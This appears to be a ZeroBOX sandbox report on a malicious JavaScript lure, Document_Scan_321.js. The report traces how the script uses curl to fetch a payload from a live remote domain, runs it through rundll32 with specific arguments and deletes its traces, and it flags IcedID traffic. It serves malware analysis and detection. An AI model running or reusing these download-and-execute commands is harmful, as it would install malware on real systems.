Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Aug. 31, 2023, 9:49 a.m.	Aug. 31, 2023, 9:51 a.m.

Size	33.0KB
Type	ASCII text, with very long lines
MD5	`e7c03a6bb595c52072921ba842e9f1ff`
SHA256	`e21ef7755a9edc8ff70096ef44491c953871498360191bc9128d9a2230da8ac9`
CRC32	`33A0D794`
ssdeep	`384:7vAwaHmh5oxN9uEovIen+G+bVq4TLIxiTjttgEIYtxa7QBcwWBIbX0KVq7rUQKao:kEyV55bEjghIYt/cQk6uo9C7G`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js
2564
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
  2656
- cmd.exe "C:\Windows\System32\cmd.exe" /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
  2712
- cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
  2808
  - curl.exe curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location
    2884
- cmd.exe "C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" "iusto.m"
  2988
- rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\iusto.m", scab /k arabika752
  3052
  - rundll32.exe "C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\iusto.m", scab /k arabika752
    2112
- cmd.exe "C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
  812

Name	Response	Post-Analysis Lookup
avestainfratech.com	A 184.168.119.55	184.168.119.55
oopscokir.com	A 104.21.64.90 A 172.67.179.217	104.21.64.90

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.179.217	Active	Moloch
184.168.119.55	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.101:49176 -> 172.67.179.217:80	2032086	ET MALWARE Win32/IcedID Request Cookie	A Network Trojan was detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.101:49169 184.168.119.55:443	C=US, ST=TX, L=Houston, O=cPanel, Inc., CN=cPanel, Inc. Certification Authority	CN=avestainfratech.com	df:8e:b4:c2:31:11:f0:2f:6a:95:27:bc:a4:2a:7e:67:b9:a3:6c:c7

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 31, 2023, 9:41 a.m.			0	0

Command line console output was observed (3 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 31, 2023, 9:49 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 31, 2023, 9:49 a.m.	buffer: curl console_handle: 0x00000007	1	1
WriteConsoleW Aug. 31, 2023, 9:49 a.m.	buffer: https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location console_handle: 0x00000007	1	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

Starts servers listening (3 events)

Time & API	Arguments	Status	Return
bind Aug. 31, 2023, 9:41 a.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen Aug. 31, 2023, 9:41 a.m.	socket: 144 backlog: 1	1	0
accept Aug. 31, 2023, 9:41 a.m.	ip_address: socket: 144 port: 0	1	152

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET http://oopscokir.com/

Performs some HTTP requests (1 event)

request

GET http://oopscokir.com/

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Aug. 31, 2023, 9:41 a.m.	process_identifier: 2112 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000000007304c000 process_handle: 0xffffffffffffffff	1	0	0

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\iusto.m.bat

Creates a suspicious process (10 events)

cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
cmdline	cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" "iusto.m"
cmdline	cmd.exe /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
cmdline	"C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" "iusto.m"
cmdline	cmd.exe /c "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
cmdline	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
cmdline	"C:\Windows\System32\cmd.exe" /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"

A process created a hidden window (6 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Aug. 31, 2023, 9:49 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js" filepath: cmd.exe	1	1
ShellExecuteExW Aug. 31, 2023, 9:49 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\iusto.m.bat" filepath: cmd.exe	1	1
ShellExecuteExW Aug. 31, 2023, 9:49 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c "C:\Users\test22\AppData\Local\Temp\iusto.m.bat" filepath: cmd.exe	1	1
ShellExecuteExW Aug. 31, 2023, 9:49 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c ren "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" "iusto.m" filepath: cmd.exe	1	1
ShellExecuteExW Aug. 31, 2023, 9:49 a.m.	show_type: 0 filepath_r: rundll32 parameters: "C:\Users\test22\AppData\Local\Temp\iusto.m", scab /k arabika752 filepath: rundll32	1	1
ShellExecuteExW Aug. 31, 2023, 9:49 a.m.	show_type: 0 filepath_r: cmd.exe parameters: /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat" filepath: cmd.exe	1	1

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
cmdline	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
cmdline	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"

One or more non-whitelisted processes were created (12 events)

parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process	wscript.exe	martian_process	cmd.exe /c ren "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" "iusto.m"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\rundll32.exe" "C:\Users\test22\AppData\Local\Temp\iusto.m", scab /k arabika752
parent_process	wscript.exe	martian_process	cmd.exe /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c ren "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" "iusto.m"
parent_process	wscript.exe	martian_process	cmd.exe /c "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\test22\AppData\Local\Temp\iusto.mpossimus.a" --ssl-no-revoke --insecure --location > "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process	wscript.exe	martian_process	cmd.exe /c del "C:\Users\test22\AppData\Local\Temp\Document_Scan_321.js"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\cmd.exe" /c del "C:\Users\test22\AppData\Local\Temp\iusto.m.bat"
parent_process	wscript.exe	martian_process	rundll32 "C:\Users\test22\AppData\Local\Temp\iusto.m", scab /k arabika752

The process wscript.exe wrote an executable file to disk which it then attempted to execute (2 events)

file	C:\Windows\System32\cmd.exe
file	C:\Windows\System32\rundll32.exe

Document_Scan_321.js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All